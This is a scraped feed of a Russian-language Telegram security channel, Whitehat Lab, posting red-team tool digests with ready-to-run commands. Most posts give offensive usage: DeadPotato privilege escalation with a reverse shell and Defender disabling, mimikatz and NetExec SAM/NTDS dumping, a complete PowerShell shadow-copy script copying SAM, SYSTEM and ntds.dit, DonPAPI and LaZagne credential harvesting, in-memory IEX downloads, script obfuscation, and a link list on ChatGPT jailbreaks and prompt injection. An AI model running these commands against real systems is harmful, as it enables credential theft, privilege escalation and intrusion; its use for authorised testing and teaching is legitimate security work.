Whitehat Lab
2.15K subscribers
344 photos
393 links
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое

Чат: @whitehat_chat

Все материалы предназначены исключительно в образовательных целях
Download Telegram
👩‍💻 OpenAI Cookbook

Руководства, библиотеки и примеры кодов для выполнения различных задач с API OpenAI

Полезное:

😉 How to work with large language models
😉 Introduction to GPT-4o and GPT-4o mini
😉 Using GPT4o mini to tag and caption images
😉 How to parse PDF docs for RAG
😉 Using reasoning for data validation
😉 How to call functions with chat models

Библиотеки:

😉 Chainlit - making chatbot interfaces 🐍
😉 Embedchain - managing and syncing unstructured data with LLMs 🐍
😉 LangChain - chaining sequences of language model prompts 🐍🖥
😉 Outlines - provides a domain-specific language to simplify prompting 🐍

Пример транскрибации
🎧 аудио файла:

import requests
import base64
import os
import json

# Load the API key from the environment variable
api_key = os.getenv("OPENAI_API_KEY")


def process_audio_with_gpt_4o(base64_encoded_audio, output_modalities, system_prompt):
# Chat Completions API end point
url = "https://api.openai.com/v1/chat/completions"

# Set the headers
headers = {
"Content-Type": "application/json",
"Authorization": f"Bearer {api_key}"
}

# Construct the request data
data = {
"model": "gpt-4o-audio-preview",
"modalities": output_modalities,
"audio": {
"voice": "alloy",
"format": "wav"
},
"messages": [
{
"role": "system",
"content": system_prompt
},
{
"role": "user",
"content": [
{
"type": "input_audio",
"input_audio": {
"data": base64_encoded_audio,
"format": "wav"
}
}
]
}
]
}

request_response = requests.post(url, headers=headers, data=json.dumps(data))
if request_response.status_code == 200:
return request_response.json()
else:
print(f"Error {request_response.status_code}: {request_response.text}")
return


audio_wav_path = "./sounds/keynote_recap.wav"

# Read the WAV file and encode it to base64
with open(audio_wav_path, "rb") as audio_file:
audio_bytes = audio_file.read()
english_audio_base64 = base64.b64encode(audio_bytes).decode('utf-8')

modalities = ["text"]
prompt = "The user will provide an audio file in English. Transcribe the audio to English text, word for word. Only provide the language transcription, do not include background noises such as applause. "

response_json = process_audio_with_gpt_4o(english_audio_base64, modalities, prompt)

english_transcript = response_json['choices'][0]['message']['content']

print(english_transcript)


😉 Home
💻 Cookbook

#openai #api #cheatsheet #llm

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
💻 ADCS Attack Techniques Cheatsheet

Отличная шпаргалка по атакам на ADCS
Разобраны основные инструменты для проверки и эксплуатации уязвимостей

😹 Certipy
😹 Certify
😹 PSPKIAud
😹 LSmith
😹 BloodHound
😹 Certi
😹 Adalanche
😹 PingCastle
😹 impacket
😹 Metasploit

💻 Cheatsheet

#adcs #active_directory #windows #esc #pentest

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🖥 Awesome GPT Super Prompting

🟢 ChatGPT Jailbreaks
🟢 GPT Assistants Prompt Leaks
🟢 GPTs Prompt Injection
🟢 LLM Prompt Security
🟢 Prompt Hack
🟢 Prompt Security
🟢 Ai Prompt Engineering
🟢 Adversarial Machine Learning


🖥 Home

#llm #prompthack #gpt

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥 CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface

➡️ https://security.paloaltonetworks.com/CVE-2024-9474
➡️ CVE-2024-0012 & CVE-2024-9474 Research

Уязвимые версии:

🟢 PAN-OS < 11.2.4-h1
🟢 PAN-OS < 11.1.5-h1
🟢 PAN-OS < 11.0.6-h1
🟢 PAN-OS < 10.2.12-h2
🟢 PAN-OS < 10.1.14-h6


🖥 PAN-OS auth bypass + RCE - PoC

#panos #rce #poc #cve

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🏃 PowerHuntShares v2.1

Инструмент для аудита сетевых ресурсов (SMB shares), написан на PowerShell

➡️ Подробнейший гайд (english)

Запуск:

Set-ExecutionPolicy -Scope Process Bypass
Import-Module .\PowerHuntShares.psm1

# Загрузка и запуск из памяти
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
[Net.ServicePointManager]::SecurityProtocol =[Net.SecurityProtocolType]::Tls12

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerHuntShares/main/PowerHuntShares.psm1")


# Запуск с доменного хоста
Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test

# Запуск с НЕ доменного хоста
runas /netonly /user:domain\user PowerShell.exe
Import-Module .\PowerHuntShares.psm1
Invoke-HuntSMBShares -Threads 100 -RunSpaceTimeOut 10 -OutputDirectory c:\folder\ -DomainController 10.1.1.1 -Credential domain\user


На выходе получаем красивый 🖥 HTML отчет

🖥 Home

#PowerHuntShares #powershell #soft #smb #windows #active_directory

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
1
🏃 psobf v1.0 Powershell Obfuscator

Инструмент для обфускации PoSh скриптов, написан на 🖼️ Go

Установка:

go install github.com/TaurusOmar/psobf@latest


Запуск:

psobf -i .\revsh.ps1 -o revsh_obf.ps1 -level 1


На вход подаем оригинальный скрипт, на выход получаем обфусцированный и указываем уровень обфускации, всего их 5

Примеры:

# Original
Write-Host "Hello, World!"

# Obfuscated level 1
$obfuscated = $([char[]]("`W`,`r`,`i`,`t`,`e`,`-`,`H`,`o`,`s`,`t`,` `,`"`,`H`,`e`,`l`,`l`,`o`,`,` `,`W`,`o`,`r`,`l`,`d`,`!`,`"`") -join ''); Invoke-Expression $obfuscated


# Original
Write-Host "Hello, World!"

# Obfuscated level 2
$obfuscated = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8sIFdvcmxkISI=')); Invoke-Expression $obfuscated


# Original
Write-Host "Hello, World!"

# Obfuscated level 3
$e = [System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8sIFdvcmxkISI='); $obfuscated = [System.Text.Encoding]::UTF8.GetString($e); Invoke-Expression $obfuscated


# Original
Write-Host "Hello, World!"

# Obfuscated level 4
$compressed = 'H4sIAAAAAAAAC+NIzcnJVyjPL8pJUQQAlRmFGwwAAAA='; $bytes = [System.Convert]::FromBase64String($compressed); $stream = New-Object IO.MemoryStream(, $bytes); $decompressed = New-Object IO.Compression.GzipStream($stream, [IO.Compression.CompressionMode]::Decompress); $reader = New-Object IO.StreamReader($decompressed); $obfuscated = $reader.ReadToEnd(); Invoke-Expression $obfuscated


# Original
Write-Host "Hello, World!"

# Obfuscated level 5
$fragments = @(
'Write-',
'Output "',
'Hello,',
' Wo',
'rld!',
'"'
);
$script = $fragments -join '';
Invoke-Expression $script


🖥 Home

#soft #powershell #obfuscator #psobf

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⌨️ DonPAPI v1.2.0

DPAPI (Data Protection API) - крипто интерфейс в 💻Windows, который обеспечивает программам шифрование их сохраненных данных (пароли, cookie, токены и т.д.)

Данный инструмент позволяет забрать необходимые данные удаленно, написан на 🐍

Собираемые данные:

Chromium браузеры
Windows сертификаты
Диспетчер УД (Credential Manager)
Firefox
Mobaxterm
MRemoteNg
RDC Manager
SCCM
Vaults
VNC


Установка/Запуск:

pipx install donpapi

pipx run donpapi collect -u admin -p 'Password' -d domain.local -t ALL


GUI для просмотра собранных данных:

pipx run donpapi gui

https://127.0.0.1:8088


Поддерживает аутентификацию Kerberos, Pass The Hash
-k
--hashes
--aesKey

🖥 Home
➡️ Секреты DPAPI

#python #donpapi #soft #dpapi

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
💻 Living Off The Land Active Directory

Exploiting Native AD Techniques for Security


😉 LOLAD

Проект
предоставляет обширную коллекцию методов, команд и функций 💻 Active Directory, которые можно использовать для операций по обеспечению безопасности и тренировки Redteam
Базу надо знать! 👍

Некоторые примеры:

# Collect Domain SID
Get-ADDomain | Select-Object SID

# Users with Delegation Privileges
Get-ADUser -Filter {TrustedForDelegation -eq $true}

# Get Domain Users Last Logon Time
Get-ADUser -Filter * -Properties LastLogonDate | Select Name, LastLogonDate

# List Users in Specific Group
Get-ADGroupMember -Identity "Domain Admins" | Select-Object Name, SamAccountName

# List Service Principal Names (SPNs)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} | Select-Object Name, ServicePrincipalName

# Check for Kerberos Pre-Authentication Disabled Accounts
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Select Name, SamAccountName


💻 Home

#lolad #redteam #active_directory #powershell #windows

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
😉 🔄 NetExec (nxc) v1.3

NetExec является форком и продолжением утилиты crackmapexec

Отличный инструмент для проведения пентеста 😭 Active Directory (сбор информации, пост эксплуатация, брутфорс учетных данных)

Большое кол-во фиксов, изменений - подробнее

Поддержка протоколов:

mssql
winrm
vnc
ftp
rdp
ssh
ldap
wmi
smb
nfs


Установка в 🐧 Kali:

sudo apt update && sudo apt install netexec


Скачать:

💻 Windows
💻 MacOS

💻 Home
➡️ Docs

#nxc #netexec #python #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄🤖 APKLeaks v2.6.3

Сканер APK файлов на различные секреты, ссылки и эндпоинты. Написан на 🐍 Python

Установка:

pip3 install apkleaks

Запуск:

apkleaks -f ~/path/to/file.apk

💻 Home

#apkleaks #soft #python #reverse

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🖥💻 Evil-WinRM-ai v4.0 with AI LLM support

В данной версии интегрировали поддержку LLM 😄😱👍

🔩 Инструмент для подключения к 💻 Windows системам посредством WinRM (Windows Remote Management). Реализация WS-Management от 💻Microsoft. Стандартный протокол на основе SOAP, который позволяет взаимодействовать оборудованию и ОС разных производителей. Microsoft включила его в свои операционные системы, чтобы облегчить жизнь системным администраторам. По умолчанию служба работает на 5985, 5986 портах.

Установка Ollama:

curl -fsSL https://ollama.com/install.sh | sh

ollama pull llama3.1

ollama run llama3.1

# Проверка
curl -s -D - localhost:11434/api/chat -d '{"model":"llama3.1"}'


Установка Evil-WinRM:

sudo gem install evil-winrm-ai


Запуск разных моделей:

# Ollama, specifying an LLM model setting the URL of the listener containing the Ollama service

evil-winrm-ai -u Adm -p 'pass' -i 192.168.1.10 --llm ollama --llm-url 'https://127.0.0.1:11434' --llm-model ollama/llama3.1

# OpenAI, specifying an LLM model and enabling the LLM commands history

evil-winrm-ai -u Adm -p 'pass' -i 192.168.1.10 --llm openai --llm-api-key 'xxx' --llm-history --llm-model gpt-4o

# Gemini, just using it enabling debug mode
evil-winrm-ai -u Adm -p 'pass' -i 192.168.1.10 --llm gemini --llm-api-key 'xxx' --llm-debug

# Mistral-AI, specifying an LLM model
evil-winrm-ai -u Adm -p 'pass' -i 192.168.1.10 --llm mistral-ai --llm-api-key 'xxx' --llm-model open-mistral-7b


LLM опции:

--llm LLM (Ollama, Openai, Anthropic, Mistral-ai, Gemini, Azureopenai)
--llm-model модель LLM
--llm-url URL сервиса (Ollama и Azureopenai)
--llm-api-key ключ API
--llm-history история команд
--llm-debug отладка


После подключения к хосту используем команду ai: и далее наш промпт

ai:enumerate local users

ai:enumerate local groups


Возможности:

▪️ Загрузка PowerShell скриптов
▪️ Загрузка dll файлов
▪️ Запуск .NET приложений
▪️ Pass-the-hash,
▪️ Kerberos аутентификация
▪️ Поддержка SSL
▪️
Upload и Download файлов
▪️ История команд
▪️ Удобный и цветастый промпт


Запуск:

evil-winrm-ai -i 192.168.1.100 -u Adm -p 'pass' -s '/home/user/ps1_scripts/' -e '/home/user/exe_files/' --llm ollama --llm-url 'https://127.0.0.1:11434' --llm-model llama3.1:latest


💻 Home

#evilwinrm #winrm #pentest #ruby #llm #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
1
🔄 🖼️ Ferox buster v2.11.0

Современный высокоскоростной фаззер, написанный на Rust.
Огромное количество настроек. Во время сканирования позволяет работать в интерактивном режиме не прерывая работу.

Установка в Kali:

sudo apt update && sudo apt install -y feroxbuster


Windows
via chocolatey или winget:

choco install feroxbuster

winget install epi052.feroxbuster


Примеры:

feroxbuster -u https://127.1 -x pdf -x js,html -x php txt json,docx

feroxbuster -u https://127.1 -H Accept:application/json "Authorization: Bearer {token}"

feroxbuster -u https://127.1 --insecure --proxy https://127.0.0.1:8080

cat targets | feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files

feroxbuster -u https://127.1 --extract-links

feroxbuster -u https://127.1 --filter-status 301

feroxbuster -u https://127.1 --filter-regex '[aA]ccess [dD]enied.?' --output results.txt --json


💻 Home
👩‍💻 Документация

#feroxbuster #fuzzing #rust #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄❗️ Trivy v 0.61.0

Сканер уязвимостей в контейнерах и не только. Написан на 💻

Цели:

▪️ Контейнеры
▪️ Файловые системы
▪️ Git репозитории (удаленный)
▪️ Образы ВМ
▪️ Kubernetes
▪️ AWS

Сканирует:

▪️ ПО и зависимости
▪️ Известные уязвимости (CVEs)
▪️ Мисконфиги
▪️ Чувствительную информацию

Установка в 🐧 Debian like:

wget https://github.com/aquasecurity/trivy/releases/download/v0.56.2/trivy_0.56.2_Linux-64bit.deb

sudo dpkg -i trivy_0.56.2_Linux-64bit.deb


Примеры:

trivy <target> [--scanners <scanner1,scanner2>] <subject>

trivy image python:3.4-alpine

trivy fs --scanners vuln,secret,misconfig myproject/

trivy k8s --report summary cluster

trivy sbom /path/to/sbom_file


💻 Github
💻 Releases
📔 Docs

#trivy #soft #golang

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
💻ApacheTomcatScanner v3.7.2

Узкоспециализированный инструмент написанный на 💻 python для поиска уязвимостей веб-сервера Apache Tomcat

Установка
:

sudo python3 -m pip install apachetomcatscanner


Запуск:

ApacheTomcatScanner -tt 172.16.0.10 -tp - —-list-cves


▪️ Проверка доступности
▪️ Многопоточность
▪️ Проверка стандартных УД
▪️ Определение версии
▪️ Список уязвимостей и CVE
▪️ Поддержка прокси
▪️ Экспорт в xlsx, json, sqlite

💻 Download

#tomcat #apache #apachetomcatscanner #soft #python

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄🔺 Dalfox 2.10.0

Мощный инструмент для поиска и обнаружения XSS уязвимостей. Написан на 🖼️ Go

Установка:
go install github.com/hahwul/dalfox/v2@latest

Пример:
dalfox url https://testphp.vulnweb.com/listproducts.php?cat=123&artist=123&asdf=ff -b https://your-callback-url

💻 Home
🔠 Wiki

#soft #dalfox #golang

✈️Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
💻 🗂 Доклады с конференции Black Hat USA 2024

Notes from Black Hat USA 2024:
“I hate to report it, but the Russian underground is as strong as ever”


🎃👍

💻 Home
💻 Download

#pentest #blackhat #blackhatusa

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 🪟 📞 DeadPotato v 1.2

Пополнение в "картофельном" семействе. Как и для остальных необходима привилегия SeImpersonatePrivilege

Возможности:

deadpotato.exe -cmd "whoami"
deadpotato.exe -rev 192.168.10.30:9001
deadpotato.exe -exe paylod.exe
deadpotato.exe -newadmin adm:pass
deadpotato.exe -shell
deadpotato.exe -mimi sam
deadpotato.exe -defender off
deadpotato.exe -sharphound


💻 Home

#lpe #windows #potato #soft #csharp

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 📞 The LaZagne Project v2.4.6

Инструмент для восстановления забытых 😄 паролей, написан на Python 💻 На самом деле средство пост эксплуатации, поддерживается большое количество программ: браузеры, IM, почтовые клиенты.

📌 Список

Примеры использования:

laZagne.exe all
laZagne.exe browsers -firefox
laZagne.exe all -oA -output C:\Users\test\Desktop
laZagne.exe all -quiet -oA
laZagne.exe all -password Password


💻 Home
💻 Download

#lazagne #python #password #recovery #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 💻 Ghauri v1.4.2

🔺 Продвинутый кроссплатформенный инструмент, автоматизирующий процесс обнаружения и эксплуатации 🔥 SQL-инъекций.
Если вкратце то SQLMap на минималках 😃
Проект интересный. С простенькими заданиями справился, что приятно удивило!

Поддерживаемые техники:

Boolean based
Error Based
Time Based
Stacked Queries


Поддерживаемые СУБД:

MySQL
Microsoft SQL Server
Postgres
Oracle


Поддерживаемые типы:

GET/POST
Headers
Cookies
Mulitipart Form data
JSON
SOAP/XML


⚙️ Установка и запуск:

git clone https://github.com/r0oth3x49/ghauri.git

python3 -m pip install --upgrade -r requirements.txt


python3 setup.py install

ghauri -u 'https://62.173.140.174:16015/user.php?login=asd&password=asd' --batch -v 2 --dbs

💻 Download

#ghauri #sqli #sqlinjection #python #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
😭 Windows dump SAM, NTDS

SAM - Security Account Manager. Хранит информацию о локальных пользователях, включая хеши паролей и идентификаторы

NTDS - основной файл ntds.dit NT Directory Services, dit - Directory Information Tree
БД в которой хранится информация обо всех объектах. Находится на контроллере домена

Есть различные варианты получить данные файлы, например с помощью mimikatz или NetExec

.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

.\mimikatz.exe "privilege::debug" "lsadump::lsa /inject" "exit"


nxc smb 192.168.1.100 -u da -p 'PASSWORDHERE' --sam

nxc smb 192.168.1.100 -u da -p 'PASSWORDHERE' --ntds


Доработал простенький скрипт на 🏃 PowerShell, который используя службу теневого копирования (VSS) позволит скопировать данные файлы. Необходимы повышенные привилегии

Работает на десктопных (понятно без ntds.dit) и на серверных системах, включая DC

Скрипт при необходимости создает директорию C:\Temp и копирует туда файлы, так же включает VSS и по окончании работы отключает.
Запускать в классическом 🏃 Windows PowerShell (в 7.x не отработает)

$vss=(Get-Service -name VSS)

if($vss.Status -ne "Running"){

$notrunning=1; $vss.Start()

}

$tempdir = "C:\Temp"

if (!(Test-Path $tempdir)) {

New-Item -ItemType Directory -Path $tempdir

}

$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")

cmd /c copy "$($volume.DeviceObject)\windows\system32\config\sam" $tempdir
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\system" $tempdir

if (Test-Path -Path "C:\Windows\NTDS\ntds.dit") {

cmd /c copy "$($volume.DeviceObject)\Windows\NTDS\ntds.dit" $tempdir

}

$volume.Delete(); if($notrunning -eq 1){

$vss.Stop()

}


Полученные файлы разбираем в 💻 Kali использую secretsdump из пакета impacket

impacket-secretsdump LOCAL -sam SAM -system SYSTEM

impacket-secretsdump LOCAL -ntds ntds.dit -system SYSTEM


Что делать с хешиками вы уже знаете 😄👍

💻 Скрипт

#windows #sam #ntds #hashes #powershell

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM